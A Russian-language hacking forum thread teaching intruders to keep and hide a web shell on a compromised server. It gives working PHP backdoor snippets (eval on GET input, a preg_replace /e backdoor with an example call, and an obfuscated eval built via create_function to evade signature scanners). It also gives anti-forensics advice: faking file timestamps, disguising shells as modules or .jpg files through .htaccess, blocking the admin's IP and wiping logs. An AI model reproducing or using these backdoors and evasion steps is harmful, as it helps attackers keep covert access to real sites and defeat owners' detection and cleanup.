Основан 26 Июля 2013 года
freehacks.ru fhacksnplmzxaaoo.onion
ClickPay24
TrinityBot
Показано с 1 по 3 из 3
  1. #1
    Trust
    TopicStarter
    Аватар для Develop

    Статус
    Offline
    Регистрация
    27.07.2013
    Сообщений
    390
    Репутация
    77 + / -
    Web-программист

    Основы сокрытия шелла на сервере.

    И так, вы залились, у вас есть несколько часов до прибытие админа.

    1. Не редко бывает что сайт состоит из модулей. Копируем наш шелл в папку с модулями, придумываем ему тематическое название (Проверьте обязательно работоспособность)

    2. Шелл желательно должен передавать данные методом cookie(), а не POST, либо GET. Меньшее палево в логах.

    3. Touch - одно из самых главных. Смотрим среднюю дату изменений рядом лежащих файлов, и меняем.

    4. Обязательно несколько разных шеллов в разных директориях (Часто админ удаляет один шелл. Советую заливать r57 как файл для удаления, ибо все АВ и сканеры, сразу его палят).

    5. Открываем любой файл движка. Если ломайте не самописный двиг, то там обычно текст лицензии, обязательно его добавляем в наш шелл.

    6. Файл .htaccess, маскировать шелл как .jpg файл. Палево. Ибо .htaccess выведется при ls -la. Редко администратор смотрит за системой через GUI (KDE, Gnome)
    Цитата:
    AddHandler application/x-httpd-php .jpg
    7. Бэкдор в файле. И не стоит делать их явными:
    Код:
    <?PHP eval($_GET['c']); ?>
    Одно время делал вот так:
    Код:

    Код:
    if (intval($_GET['id_session_number'])){ 
        preg_replace("/users/e",$_GET['id_session_text'],$_GET['id_session_number']); 
    }
    Если админ ламер, или не увидит это, то выполнение кода легко:
    Код:
    /file.php?id_session_number=userslol&id_session_tex t=phpinfo();
    8. ОБЯЗАТЕЛЬНО ЧИСТИМ ЛОГИ. Логи веб сервера, логи в админ панель о неудачной авторизации.

  2. 2 пользователя(ей) сказали cпасибо:
  3. #2
    Trust
    Аватар для ul1k317

    Статус
    Offline
    Регистрация
    26.08.2013
    Сообщений
    793
    Репутация
    397 + / -
    Web-программист
    Стоит уделить особое внимание 8 пункту! Особенно касаемо POST запросов. Они сразу палятся админом и Вас вычисляют по IP и бьют морду лица (пару лет назад я сам звонил работодателю одно из горе-хакеров, который ломанул мой блог с рабочего компа, а его IP принадлежал фирме в которой он работал. парнишку жестко там вые**и).

    И еще, стоит посмотреть в логах ip админа и палить в шеле этот ip чтобы не давать доступ.

  4. #3
    Trust
    Аватар для ul1k317

    Статус
    Offline
    Регистрация
    26.08.2013
    Сообщений
    793
    Репутация
    397 + / -
    Web-программист
    Вот кстати хитрый eval. Юзайте на здоровье.

    Код:
    $cmd = 'phpinfo();';
    
    define('argv_wp_plugins','WP_PLUGINS_HEADER_VISIBILITY');
    $wp_tmp_var_a = argv_wp_plugins;
    $wp_cmd = $wp_tmp_var_a[12].$wp_tmp_var_a[18];
    $_fn = 'wp_sost_func'.time();
    $wp_func = create_function('$v1', 'function '.$_fn.'(){ global $cmd; '.$wp_cmd.$wp_tmp_var_a[13].$wp_tmp_var_a[24].'($cmd); }');
    $wp_func($wp_cmd);
    $_fn();
    exit();
    Естественно $cmd может приходить в GET'е

    Во-Первых можно генерить любые строки из которых потом составляем eval. Так что обходим поиск по сигнатуре.
    Во-вторых никаких base64, что так-же обеспечивает стойкость.

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Информация на сайте предоставлена исключительно в ознакомительных целях, использование знаний в противозаконных целях преследуется по закону! Администрация не несет ответственности за ваши деяния.